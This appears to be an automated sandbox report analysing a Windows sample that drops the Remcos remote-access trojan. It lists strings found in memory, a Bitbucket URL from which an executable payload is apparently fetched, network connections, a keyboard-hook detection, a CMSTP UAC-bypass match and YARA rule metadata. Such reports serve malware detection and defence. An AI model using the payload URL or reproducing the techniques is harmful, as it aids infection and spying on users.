                      Source: csc.exe, 00000003.00000003.2510018923.00000000085F0000.00000004.00000800.00020000.00000000.sdmp, yjfesx.exe, 00000005.00000002.2829283806.00000000136AE000.00000004.00001000.00020000.00000000.sdmp, yjfesx.exe, 00000005.00000000.2506800758.000000000051C000.00000020.00000001.01000000.00000008.sdmp, HardDiskSentinelBin.exe.5.drString found in binary or memory: http://www.hdsentinel.com/sendreport.phpU
                      Source: csc.exe, 00000003.00000003.2510018923.00000000085F0000.00000004.00000800.00020000.00000000.sdmp, yjfesx.exe, 00000005.00000002.2829283806.00000000136AE000.00000004.00001000.00020000.00000000.sdmp, yjfesx.exe, 00000005.00000000.2506800758.000000000051C000.00000020.00000001.01000000.00000008.sdmp, HardDiskSentinelBin.exe.5.drString found in binary or memory: http://www.hdsentinel.comU
                      Source: HardDiskSentinelBin.exe.5.drString found in binary or memory: http://www.indyproject.org/
                      Source: 3XSXmrEOw7.exeString found in binary or memory: http://www.microsoft.c
                      Source: csc.exe, 00000003.00000002.3992663991.0000000006EC6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000711E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713B000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                      Source: csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
                      Source: csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
                      Source: csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
                      Source: csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
                      Source: csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                      Source: csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
                      Source: csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
                      Source: csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws
                      Source: csc.exe, 00000003.00000002.3992663991.0000000006ECA000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com
                      Source: csc.exe, 00000003.00000002.3992663991.0000000006ECA000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-
                      Source: csc.exe, 00000003.00000002.3992663991.000000000710D000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.0000000006E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
                      Source: csc.exe, 00000003.00000002.3992663991.000000000708E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/facturacioncol/fact/downloads/null.exe
                      Source: csc.exe, 00000003.00000002.3992663991.0000000006EC6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000711E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713B000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                      Source: csc.exe, 00000003.00000002.3992663991.0000000006EC6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000711E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713B000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                      Source: csc.exe, 00000003.00000003.2510018923.000000000828E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3994880865.00000000098E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: csc.exe, 00000003.00000003.2510018923.000000000828E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3994880865.00000000098E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: csc.exe, 00000003.00000003.2510018923.000000000828E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3994880865.00000000098E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: csc.exe, 00000003.00000002.3992663991.0000000006EC6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000711E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713B000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                      Source: csc.exe, 00000003.00000002.3992663991.0000000006EC6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000711E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713B000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                      Source: csc.exe, 00000003.00000003.2510018923.000000000828E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3994880865.00000000098E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: csc.exe, 00000003.00000003.2510018923.000000000828E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.0000000006E11000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3994880865.00000000098E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: csc.exe, 00000003.00000003.2510018923.000000000828E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3994880865.00000000098E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: csc.exe, 00000003.00000002.3992663991.0000000006EC6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000711E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713B000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                      Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49736 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 54.231.203.105:443 -> 192.168.2.5:49743 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Installs a global keyboard hook
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\yjfesx.exeJump to behavior
                      Source: Yara matchFile source: 5.2.yjfesx.exe.5b30000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.yjfesx.exe.5aa0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.yjfesx.exe.5aa0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.yjfesx.exe.5b30000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: yjfesx.exe PID: 5860, type: MEMORYSTR

                      E-Banking Fraud

                      barindex
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 5.2.yjfesx.exe.5b30000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.yjfesx.exe.5aa0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.yjfesx.exe.5aa0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.yjfesx.exe.5b30000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.3992191462.00000000099C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: yjfesx.exe PID: 5860, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: yjfesx.exe PID: 768, type: MEMORYSTR

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 5.2.yjfesx.exe.5b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 5.2.yjfesx.exe.5b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 5.2.yjfesx.exe.5b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 5.2.yjfesx.exe.5aa0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 5.2.yjfesx.exe.5aa0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 5.2.yjfesx.exe.5aa0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 5.2.yjfesx.exe.5aa0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 5.2.yjfesx.exe.5aa0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 5.2.yjfesx.exe.5aa0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 5.2.yjfesx.exe.5b30000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 5.2.yjfesx.exe.5b30000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 5.2.yjfesx.exe.5b30000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: Process Memory Space: yjfesx.exe PID: 5860, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      .NET source code contains very large array initializations
                      Source: 0.2.3XSXmrEOw7.exe.880000.1.raw.unpack, CentralIterator.csLarge array initialization: IterateAdaptableIterator: array initializer size 543744
                      Drops large PE files
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeFile dump: ElectronArtsCLI.exe.0.dr 979567344Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeFile dump: HardDiskSentinelBin.exe.5.dr 979567142Jump to dropped file
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00413845 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,GetLastError,FormatMessageA,LocalFree,0_2_00413845
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004080600_2_00408060
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004080200_2_00408020
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004070E00_2_004070E0
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004080FE0_2_004080FE
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004080980_2_00408098
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004080A50_2_004080A5
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004071520_2_00407152
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004071660_2_00407166
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0041E1000_2_0041E100
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004081060_2_00408106
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0040711D0_2_0040711D
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004081240_2_00408124
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004071250_2_00407125
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0040813A0_2_0040813A
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004081D00_2_004081D0
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004091B90_2_004091B9
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004242500_2_00424250
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0040720A0_2_0040720A
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004082F30_2_004082F3
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004083770_2_00408377
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004083ED0_2_004083ED
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004083BB0_2_004083BB
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004084DF0_2_004084DF
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004084F40_2_004084F4
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004074F50_2_004074F5
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004075000_2_00407500
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004075C00_2_004075C0
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004095CC0_2_004095CC
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004075E00_2_004075E0
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004075F00_2_004075F0
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004075F80_2_004075F8
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004065990_2_00406599
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004076520_2_00407652
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004097300_2_00409730
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004097DD0_2_004097DD
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004087E00_2_004087E0
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004097EE0_2_004097EE
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004088120_2_00408812
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0040983B0_2_0040983B
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004058F30_2_004058F3
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004059050_2_00405905
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0040591E0_2_0040591E
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004059250_2_00405925
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004069A70_2_004069A7
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00407A060_2_00407A06
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00408AE80_2_00408AE8
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406BD30_2_00406BD3
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00407C5E0_2_00407C5E
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406C1B0_2_00406C1B
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00407C350_2_00407C35
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00407C3A0_2_00407C3A
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406CE60_2_00406CE6
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00407CE70_2_00407CE7
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406C960_2_00406C96
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406D400_2_00406D40
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00407D5C0_2_00407D5C
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00407D7C0_2_00407D7C
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406D1C0_2_00406D1C
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406E400_2_00406E40
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406E500_2_00406E50
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00415E700_2_00415E70
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00429E1C0_2_00429E1C
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406E300_2_00406E30
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406EA00_2_00406EA0
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406EA90_2_00406EA9
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406EB70_2_00406EB7
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00407F650_2_00407F65
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406F0B0_2_00406F0B
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406F1B0_2_00406F1B
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406F2C0_2_00406F2C
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406FD00_2_00406FD0
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406F960_2_00406F96
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_097C42603_2_097C4260
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_097C1C883_2_097C1C88
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_097C4E783_2_097C4E78
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_097C081E3_2_097C081E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_097C45A83_2_097C45A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_06AF6BC03_2_06AF6BC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_06AF15603_2_06AF1560
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_06AF154F3_2_06AF154F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_06AF42823_2_06AF4282
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_06AF42F03_2_06AF42F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_06AF6BB03_2_06AF6BB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095E18A23_2_095E18A2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095E22C33_2_095E22C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_098088903_2_09808890
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0980897A3_2_0980897A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0980C97E3_2_0980C97E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_098088803_2_09808880
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_098038A13_2_098038A1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09807EF73_2_09807EF7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_099300403_2_09930040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_099334683_2_09933468
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_099310D83_2_099310D8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_099303673_2_09930367
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\yjfesx.exe CA84EC6D70351B003D3CACB9F81BE030CC9DE7AC267CCE718173D4F42CBA2966
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: String function: 00424A8C appears 166 times
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: String function: 004046E0 appears 63 times
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: String function: 00428B04 appears 70 times
                      Source: 3XSXmrEOw7.exeStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
                      Source: 3XSXmrEOw7.exeStatic PE information: Resource name: RT_STRING type: PDP-11 demand-paged pure executable not stripped
                      Source: ElectronArtsCLI.exe.0.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
                      Source: ElectronArtsCLI.exe.0.drStatic PE information: Resource name: RT_STRING type: PDP-11 demand-paged pure executable not stripped
                      Source: 3XSXmrEOw7.exeBinary or memory string: OriginalFilename vs 3XSXmrEOw7.exe
                      Source: 3XSXmrEOw7.exe, 00000000.00000002.2354129676.0000000002736000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoRun7.exeP vs 3XSXmrEOw7.exe
                      Source: 3XSXmrEOw7.exeBinary or memory string: OriginalFilenameAutoRun7.exeP vs 3XSXmrEOw7.exe
                      Source: 3XSXmrEOw7.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: 5.2.yjfesx.exe.5b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 5.2.yjfesx.exe.5b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 5.2.yjfesx.exe.5b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 5.2.yjfesx.exe.5aa0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 5.2.yjfesx.exe.5aa0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 5.2.yjfesx.exe.5aa0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
